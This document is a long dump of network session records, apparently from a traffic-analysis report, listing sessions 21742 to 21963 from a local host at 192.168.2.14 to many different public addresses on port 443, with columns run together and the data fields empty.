                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21742192.168.2.144595057.6.44.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21743192.168.2.143599424.220.217.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21744192.168.2.145800866.174.58.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21745192.168.2.1460286192.61.176.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21746192.168.2.1449420193.46.44.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21747192.168.2.144224053.248.112.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21748192.168.2.1441136183.28.65.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21749192.168.2.1440522147.250.120.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21750192.168.2.1446700146.67.131.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21751192.168.2.1459296166.186.166.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21752192.168.2.1439908143.153.215.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21753192.168.2.145715661.248.25.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21754192.168.2.146020882.96.121.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21755192.168.2.1450178143.124.44.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21756192.168.2.143929077.112.73.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21757192.168.2.1440516123.42.219.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21758192.168.2.146080286.63.106.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21759192.168.2.1446750189.22.98.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21760192.168.2.14419029.188.1.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21761192.168.2.1452084106.238.113.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21762192.168.2.1453572110.95.55.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21763192.168.2.143394235.202.174.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21764192.168.2.1456506173.24.70.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21765192.168.2.1450010125.155.52.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21766192.168.2.145689272.133.34.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21767192.168.2.1438960186.239.130.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21768192.168.2.143348472.250.72.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21769192.168.2.1455272147.5.83.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21770192.168.2.1441140116.107.228.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21771192.168.2.144258042.3.71.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21772192.168.2.1445808164.203.87.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21773192.168.2.1450154146.107.48.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21774192.168.2.145955278.246.98.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21775192.168.2.1452028152.95.156.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21776192.168.2.1457400181.16.178.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21777192.168.2.145341617.197.155.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21778192.168.2.1459300139.198.135.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21779192.168.2.1447474180.72.166.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21780192.168.2.1434552110.200.55.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21781192.168.2.1458834187.29.231.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21782192.168.2.143732665.204.62.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21783192.168.2.1438950106.77.228.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21784192.168.2.1438558155.86.253.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21785192.168.2.145174695.45.184.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21786192.168.2.1438248170.164.233.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21787192.168.2.1451400173.91.161.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21788192.168.2.1444958190.6.66.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21789192.168.2.1445692160.212.95.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21790192.168.2.1435262168.228.243.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21791192.168.2.1442462114.123.104.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21792192.168.2.1450618118.220.163.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21793192.168.2.144901873.194.14.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21794192.168.2.1453632108.152.223.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21795192.168.2.14545048.182.47.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21796192.168.2.143374862.50.63.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21797192.168.2.1456808171.120.30.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21798192.168.2.143637868.174.216.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21799192.168.2.1433870146.176.96.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21800192.168.2.145704465.133.48.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21801192.168.2.1439664109.226.22.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21802192.168.2.144120882.216.124.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21803192.168.2.144078465.219.221.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21804192.168.2.1446678210.16.142.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21805192.168.2.14595985.126.68.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21806192.168.2.1443426125.152.41.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21807192.168.2.1442500133.238.83.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21808192.168.2.1450220152.48.36.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21809192.168.2.1439236174.86.172.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21810192.168.2.1456114112.199.213.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21811192.168.2.1457208196.238.96.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21812192.168.2.1437490130.204.133.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21813192.168.2.1455114135.171.146.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21814192.168.2.144433093.132.17.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21815192.168.2.1454876182.6.18.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21816192.168.2.1438934137.121.5.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21817192.168.2.1442684179.43.103.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21818192.168.2.1455358159.133.125.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21819192.168.2.145696644.40.28.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21820192.168.2.143414496.247.57.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21821192.168.2.1435404107.47.119.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21822192.168.2.145377632.241.52.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21823192.168.2.144843085.119.66.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21824192.168.2.14527409.56.194.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21825192.168.2.1437554134.6.189.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21826192.168.2.144584482.35.204.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21827192.168.2.1445560163.34.43.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21828192.168.2.145383218.187.72.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21829192.168.2.1435856152.91.152.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21830192.168.2.1459358170.166.37.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21831192.168.2.1441194178.90.109.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21832192.168.2.143859295.37.160.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21833192.168.2.1439326131.236.92.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21834192.168.2.144897086.19.75.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21835192.168.2.1455662121.79.215.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21836192.168.2.144532072.65.201.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21837192.168.2.143914434.42.166.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21838192.168.2.1439128177.195.245.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21839192.168.2.1436168124.222.176.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21840192.168.2.1460542136.67.178.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21841192.168.2.145058220.150.253.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21842192.168.2.145035053.177.181.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21843192.168.2.143775048.146.115.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21844192.168.2.1455036152.73.69.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21845192.168.2.1433738101.108.115.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21846192.168.2.144642618.248.218.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21847192.168.2.1449838108.233.153.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21848192.168.2.1447426114.215.209.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21849192.168.2.1436532166.239.171.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21850192.168.2.1441864211.189.142.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21851192.168.2.1434832213.141.254.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21852192.168.2.1441114194.185.242.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21853192.168.2.1455374185.20.230.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21854192.168.2.1448244118.117.253.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21855192.168.2.144665043.156.117.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21856192.168.2.145571087.219.26.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21857192.168.2.1451954173.117.94.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21858192.168.2.143316691.161.56.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21859192.168.2.1452496140.63.80.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21860192.168.2.1448166217.214.221.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21861192.168.2.1459350103.163.87.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21862192.168.2.1443562157.197.187.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21863192.168.2.1435996118.233.126.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21864192.168.2.1445854103.104.170.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21865192.168.2.144396238.246.198.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21866192.168.2.1452248222.140.242.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21867192.168.2.1439700104.15.108.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21868192.168.2.1452700176.232.29.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21869192.168.2.145172014.185.19.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21870192.168.2.1453536116.51.170.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21871192.168.2.1452454184.102.245.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21872192.168.2.145086872.108.80.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21873192.168.2.1444480179.73.221.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21874192.168.2.1446674178.8.134.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21875192.168.2.1444856101.138.59.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21876192.168.2.1449158134.56.101.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21877192.168.2.1454810109.247.141.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21878192.168.2.143951449.112.115.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21879192.168.2.1455216205.187.37.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21880192.168.2.1459168166.90.23.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21881192.168.2.143716674.128.9.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21882192.168.2.144110037.220.181.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21883192.168.2.145418050.157.205.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21884192.168.2.1444692187.6.188.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21885192.168.2.145364267.33.235.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21886192.168.2.145406614.253.159.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21887192.168.2.1460294145.23.23.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21888192.168.2.1434078182.153.144.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21889192.168.2.1454382129.70.9.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21890192.168.2.1454582109.102.46.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21891192.168.2.1432842141.137.133.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21892192.168.2.144380860.245.69.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21893192.168.2.145940027.137.182.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21894192.168.2.1438810205.124.84.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21895192.168.2.144101464.95.84.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21896192.168.2.1436846148.201.62.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21897192.168.2.1455726209.221.11.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21898192.168.2.145085858.88.181.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21899192.168.2.1455402155.248.165.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21900192.168.2.1436222208.57.54.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21901192.168.2.1451876223.210.163.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21902192.168.2.1454998117.155.196.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21903192.168.2.1457734137.48.88.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21904192.168.2.143499435.242.133.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21905192.168.2.1439594153.26.175.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21906192.168.2.143476019.61.174.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21907192.168.2.1435232151.128.7.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21908192.168.2.1441980116.77.187.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21909192.168.2.144698839.103.140.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21910192.168.2.144189883.180.89.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21911192.168.2.1433828178.38.4.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21912192.168.2.1455784160.142.135.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21913192.168.2.145125481.43.134.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21914192.168.2.1451942115.54.229.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21915192.168.2.1451690174.46.220.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21916192.168.2.143556464.170.199.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21917192.168.2.143372695.59.70.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21918192.168.2.145255438.180.230.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21919192.168.2.1439406186.79.194.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21920192.168.2.1455358220.99.43.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21921192.168.2.1439342111.93.71.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21922192.168.2.1437884216.68.54.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21923192.168.2.1445582101.229.117.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21924192.168.2.1452490134.126.5.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21925192.168.2.1449168203.144.88.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21926192.168.2.146052862.122.251.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21927192.168.2.1441972158.102.177.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21928192.168.2.1453570154.93.218.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21929192.168.2.144346281.212.125.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21930192.168.2.144556635.245.76.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21931192.168.2.1438258187.182.78.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21932192.168.2.145639657.144.203.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21933192.168.2.145845465.197.129.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21934192.168.2.1453306103.73.10.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21935192.168.2.1452602220.18.167.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21936192.168.2.1452568206.224.206.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21937192.168.2.1455914195.224.48.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21938192.168.2.144729236.157.151.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21939192.168.2.143742241.198.115.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21940192.168.2.145454497.118.51.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21941192.168.2.1439776168.85.44.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21942192.168.2.1439138205.8.209.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21943192.168.2.144348023.12.65.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21944192.168.2.143523680.213.218.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21945192.168.2.144429047.80.88.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21946192.168.2.1437440117.60.44.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21947192.168.2.1448588121.28.12.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21948192.168.2.1452636207.230.11.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21949192.168.2.1436558126.91.35.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21950192.168.2.1443988105.37.4.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21951192.168.2.1443390195.161.224.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21952192.168.2.1435840116.70.120.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21953192.168.2.145126092.151.141.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21954192.168.2.1453554150.33.16.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21955192.168.2.1433732158.32.176.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21956192.168.2.14334984.185.238.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21957192.168.2.1455146119.118.82.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21958192.168.2.143367683.126.51.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21959192.168.2.1439040131.87.190.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21960192.168.2.1452368150.49.5.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21961192.168.2.143787036.165.37.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21962192.168.2.1454048221.131.249.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21963192.168.2.143831047.4.142.236443
